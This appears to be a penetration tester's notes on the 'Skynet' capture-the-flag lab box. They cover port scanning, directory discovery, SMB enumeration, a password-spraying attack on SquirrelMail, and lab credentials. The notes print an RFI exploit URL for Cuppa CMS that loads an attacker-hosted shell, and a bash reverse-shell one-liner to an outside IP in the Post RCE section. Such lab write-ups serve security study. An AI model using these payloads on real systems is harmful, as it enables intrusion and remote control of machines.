SKYNET
Initial scanning
Nmap
These result were already very concerning.
| Port | State | Service | Version |
|---|---|---|---|
| 22/tcp | open | ssh | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.4.18 ((Ubuntu)) |
| 110/tcp | open | pop3 | Dovecot pop3d |
| 139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
| 143/tcp | open | imap | Dovecot imapd |
| 445/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
Host: SKYNET
OS: Linux
CPE: cpe:/o:linux:linux_kernel
Findings
URLs
FFUF Findings
- ~~/admin (403)~~
- /squirrelmail
- 1.4.23 (possibly vulnerable)
- ~~/ai (403)~~
- ~~/config (403)~~
- /45kra24zxs28v3yd
- 45kra24zxs28v3yd/administrator (cuppa cms)
- Has a login page. Default, known, and sprayed passwords do not work
- 45kra24zxs28v3yd/administrator/default/index.html (same login page)
- 45kra24zxs28v3yd/administrator (cuppa cms)
Creds
- milesdyson
- Squirrelmail: cyborg007haloterminator
- SMB: )s{A&2Z=F^n_E.B
- CUPPA Database
- root:password123
- admin:b686468aec2c71e1783375763dca9b7e
- Could not crack with MD5 rockyou
Suspicious files
- /home/milesdyson
- backups/backup.sh
- Uses a tar wildcard which is most likely vulnerable
- backups/backup.sh
POP3/IMAP
Appears to be plain text and unable to authenticate.
SMB
ENUM4LINUX
| Sharename | Type | Comment |
|---|---|---|
| print$ | Disk | Printer Drivers |
| anonymous | Disk | Skynet Anonymous Share |
| milesdyson | Disk | Miles Dyson Personal Share |
| IPC$ | IPC | IPC Service (skynet server (Samba, Ubuntu)) |
| #### Shares | ||
| ##### Anonymous | ||
| Found a note saying passwords need to be changed. Also found log files containing possible passwords. Attempting to enumerate. | ||
| ### Cuppa CMS | ||
| Found under skynet.thm/45kra24zxs28v3yd/administrator | ||
| It seems this is vulnerable to CVE-2022-25486 | ||
| I was able to exploit this using http://skynet.thm/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.77.246/phpshell.sh with the | ||
| ##### milesdyson | ||
| Contained important.txt which contained the url for cuppa cms | ||
| ### Burp suite intruder attack | ||
| Using the list we found in the SMB anonymous share, we can enumerate squirrelmail now. By using intruder to send many requests with varying passwords from the list, we find milesdyson has not changed his squirrelmail password. | ||
| ### Squirrelmail | ||
| We were able to compromise this password using the burpsuite password attack. Now we can see 3 messages in the inbox. One has the SMB password which was tested and is still current. Another has random text. It seems to be a reference to this random post. |
Post RCE
WWW-DATA
Everything in /var/www has already been found through other means.
Configuration.php is readable now and shows db password. Creating a persistent shell to try this.
bash -i >& /dev/tcp/10.13.77.246/5555 0>&1
Database has nothing of value besides the admin password hash.
b686468aec2c71e1783375763dca9b7e
Could not crack it with rockyou.
Updating this hash and manually logging in provides access to Cuppa, but no other meaningful info is contained within Cuppa.